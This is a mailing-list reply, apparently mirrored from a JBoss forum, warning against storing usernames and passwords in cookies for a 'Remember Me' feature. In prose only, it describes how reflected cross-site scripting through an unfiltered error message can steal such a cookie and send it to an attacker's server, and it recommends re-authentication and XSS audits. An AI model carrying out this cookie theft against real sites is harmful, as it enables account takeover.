>From a security perspective, this is not a good idea. I can steal your >username and password from the cookie with a bit of Javascript. The only >requirement for that is that somewhere in the web application, user input is >printed on the webpage unfiltered (e.g. on a registration screen, there is an >"The address $email is not valid." error message and $email comes form a form >field.)
I make you click on a link I prepared and redirect you with a POST and some malicious payload to the vulnerable registration form. My POST enters Javascript code into the form that gets then printed onto the webpage in the error message. In that Javascript, I read your cookie and send it to my server. This is known as cross-site scripting and there are many variations. Short story: Do not trust the client, do not store sensitive information on the client. The best "Remember Me" feature is something similar to what Amazon is using: A username cookie is stored on the client, and the web application welcomes the user with his real name and also shows the remembered shopping basket. However, any sensitive operation (editing the shopping basket, buying stuff) requires re-authentication. This combined with an application audit for XSS holes is a good strategy. View the original post : http://www.jboss.com/index.html?module=bb&op=viewtopic&p=4018114#4018114 Reply to the post : http://www.jboss.com/index.html?module=bb&op=posting&mode=reply&p=4018114 _______________________________________________ jboss-user mailing list [email protected] https://lists.jboss.org/mailman/listinfo/jboss-user
